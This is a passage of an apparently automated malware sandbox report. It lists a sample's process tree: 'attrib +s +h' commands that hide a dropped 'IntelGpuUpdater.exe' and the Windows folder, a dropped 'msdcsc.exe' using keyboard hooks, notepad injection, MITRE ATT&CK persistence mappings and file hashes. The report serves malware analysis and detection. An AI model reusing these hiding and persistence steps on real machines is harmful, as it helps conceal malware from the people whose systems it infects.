- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:3716 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /k attrib "C:\Windows\IntelGpuUpdater.exe" +s +h3⤵
- System Location Discovery: System Language Discovery
PID:740 -
C:\Windows\SysWOW64\attrib.exeattrib "C:\Windows\IntelGpuUpdater.exe" +s +h4⤵
- Sets file to hidden
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Views/modifies file attributes
PID:4304
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /k attrib "C:\Windows" +s +h3⤵
- System Location Discovery: System Language Discovery
PID:812 -
C:\Windows\SysWOW64\attrib.exeattrib "C:\Windows" +s +h4⤵
- Sets file to hidden
- System Location Discovery: System Language Discovery
- Views/modifies file attributes
PID:400
-
-
-
C:\Windows\TEMP\MSDCSC\msdcsc.exe"C:\Windows\TEMP\MSDCSC\msdcsc.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Modifies data under HKEY_USERS
- Suspicious use of SetWindowsHookEx
PID:4172 -
C:\Windows\notepad.exenotepad4⤵
- Modifies data under HKEY_USERS
PID:4896
-
-
-
-
C:\Windows\IntelGpuUpdater.exe"C:\Windows\IntelGpuUpdater.exe"2⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Modifies data under HKEY_USERS
- Suspicious use of SetWindowsHookEx
PID:396 -
C:\Windows\notepad.exenotepad3⤵PID:2316
-
-
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
2Registry Run Keys / Startup Folder
1Winlogon Helper DLL
1Privilege Escalation
Boot or Logon Autostart Execution
2Registry Run Keys / Startup Folder
1Winlogon Helper DLL
1Defense Evasion
Hide Artifacts
2Hidden Files and Directories
2Modify Registry
2Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
251KB
MD559a062d42753c520fa5531b312edafbd
SHA1cccbea6327b6fb94c3874981531074edea20c776
SHA256d616881a05c6d49f93d5a1997bd98c13991c1cc8ee2c3a2c05749ce12288cc8e
SHA5125f9a9db8672d89880535c5e5d8f50f0a3b750c246ef900cbaffd9e29abd90c8c84832c269bbf6923c27526432ce3997fd3457e2b691f31eef356f65eec669032
-
Filesize
256KB
MD5c721739bd54dd9beb16909f6807b73c5
SHA15ec54658246914144293357f302e68bf9972fb71
SHA2567376ce1eefd786d30efbecb716a13e9d23d27cfc362ce1bbc2fbebdf4fbf54ea
SHA5120800c5f0425237219d7d34654cc021b8b8aa1fce1545ba9815c7be12a623edb08a098fd4de40ccc867487639647cb7f316316464a3a0bdb0650fdd2852408b4e